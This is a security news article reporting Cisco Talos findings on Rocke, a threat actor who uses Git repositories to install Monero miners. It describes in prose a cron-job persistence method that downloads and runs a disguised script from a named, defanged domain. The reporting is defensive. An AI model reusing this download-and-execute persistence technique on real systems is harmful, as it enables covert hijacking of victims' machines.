Despite market volatility, Cisco Talos researchers have noticed falling cryptocurrency prices have had little to no effect on cryptomining malware campaigns.
Researchers are warning users of a Chinese-language threat actor named Rocke who has been leveraging Git repositories to infect systems with Monero-mining malware, according to an 30 August blog post.
Rocke has been on their radar since April 2018 when they began leveraging both Western and Chinese Git repositories to deliver malware to honeypot systems vulnerable to an Apache Struts vulnerability. Most recently, researchers have spotted the same threat actor engaging in another similar campaign in which allowed them more insight into Rocke's methods.
"Once the threat actor had compromised a system, they achieved persistence on the device by installing a cron job that downloads and executes a file "logo.jpg" from "3389[.]space," researchers said in the post. "
"This file is a shell script which, in turn, downloads mining executables from the threat actor's Git repositories and saves them under the filename "java." The exact file downloaded depends on the victim's system architecture. Similarly, the system architecture determines if "h32" or "h64" is used to invoke "java."
The miner's payload appears to be similar to the one used by the Iron Cybercrime Group as they both behave similarly and reach out to similar infrastructure, researchers noted.
Rocke has also been spotted attempting to access cloud storage series and manuals for programming in Chinese Easy language. Researchers suspect Rocke will continue to leverage Git repositories to download and execute illicit mining onto victim machine and will also likely carry out social engineering attacks as a new infection vector.